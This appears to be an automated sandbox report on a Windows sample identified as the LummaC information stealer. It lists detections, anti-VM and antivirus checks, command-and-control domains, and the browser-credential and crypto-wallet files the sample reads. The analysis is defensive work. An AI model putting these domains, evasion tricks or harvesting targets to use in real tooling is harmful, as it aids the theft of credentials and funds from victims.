Source: RIMz2N1u5y.exe, 00000000.00000003.2217044597.0000000002A05000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs RIMz2N1u5y.exe
Source: RIMz2N1u5y.exe, 00000000.00000003.2217044597.0000000002A05000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8 vs RIMz2N1u5y.exe
Source: RIMz2N1u5y.exe	Binary or memory string: OriginalFilename vs RIMz2N1u5y.exe
Source: RIMz2N1u5y.exe	Binary or memory string: OriginalFilename8 vs RIMz2N1u5y.exe

Source: RIMz2N1u5y.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Code function: 0_2_00870EDF CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_00870EDF

Source: Yara match	File source: RIMz2N1u5y.exe, type: SAMPLE
Source: Yara match	File source: 0.0.RIMz2N1u5y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2117748549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2217044597.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RIMz2N1u5y.exe, 00000000.00000003.2266501187.0000000003648000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266847313.0000000003629000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2289224870.0000000003640000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: RIMz2N1u5y.exe	Virustotal: Detection: 44%
Source: RIMz2N1u5y.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

File read: C:\Users\user\Desktop\RIMz2N1u5y.exe

Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: RIMz2N1u5y.exe

Static file information: File size 1791344 > 1048576

Source: RIMz2N1u5y.exe

Static PE information: Raw size of CODE is bigger than: 0x100000 < 0x123400

Source: RIMz2N1u5y.exe

Static PE information: real checksum: 0x292baa0 should be: 0x1b9f3b

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B5C9 push ebp; retf	0_3_0096B5CA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096B476 push eax; iretd	0_3_0096B4CD
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_0096C43C pushad ; ret	0_3_0096C43D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_03633EA9 push ecx; retf	0_3_03633EAA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_3_03634604 pushfd ; iretd	0_3_0363460F
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AD3FC push eax; mov dword ptr [esp], 4D4C4B9Ah	0_2_008AD3FF
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008B243D push FFFFFFFEh; ret	0_2_008B2441

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe TID: 6268	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe TID: 6272	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: RIMz2N1u5y.exe, 00000000.00000003.2311597225.0000000003617000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RIMz2N1u5y.exe, 00000000.00000003.2364685948.000000000097D000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.000000000097D000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2339015066.000000000097C000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.000000000097C000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2418065735.000000000097C000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.0000000000932000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288879427.0000000003666000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: RIMz2N1u5y.exe, 00000000.00000003.2288964949.0000000003659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008707CF mov edx, dword ptr fs:[00000030h]	0_2_008707CF
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00870D8F mov eax, dword ptr fs:[00000030h]	0_2_00870D8F
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087113F mov eax, dword ptr fs:[00000030h]	0_2_0087113F
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008713DF mov eax, dword ptr fs:[00000030h]	0_2_008713DF
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008713DE mov eax, dword ptr fs:[00000030h]	0_2_008713DE

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: RIMz2N1u5y.exe	String found in binary or memory: grannyejh.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: discokeyus.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: erectystickj.click
Source: RIMz2N1u5y.exe	String found in binary or memory: crosshuaht.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: rapeflowwj.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: aspecteirs.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: sustainskelet.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: necklacebudi.lat
Source: RIMz2N1u5y.exe	String found in binary or memory: energyaffai.lat

Source: RIMz2N1u5y.exe	Binary or memory string: Shell_TrayWnd
Source: RIMz2N1u5y.exe	Binary or memory string: Shell_TrayWndTrayNotifyWndSV

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RIMz2N1u5y.exe, 00000000.00000003.2385350668.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2370565230.000000000095B000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2417822980.0000000003620000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2369956451.0000000003621000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2389468496.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385149025.0000000003620000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2370032422.00000000009EF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RIMz2N1u5y.exe PID: 4040, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: RIMz2N1u5y.exe, 00000000.00000003.2338816648.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: RIMz2N1u5y.exe, 00000000.00000003.2338816648.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: RIMz2N1u5y.exe, 00000000.00000003.2338816648.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet'<
Source: RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet'<
Source: RIMz2N1u5y.exe, 00000000.00000003.2338816648.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: RIMz2N1u5y.exe, 00000000.00000003.2370063721.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: RIMz2N1u5y.exe, 00000000.00000003.2339015066.000000000093D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
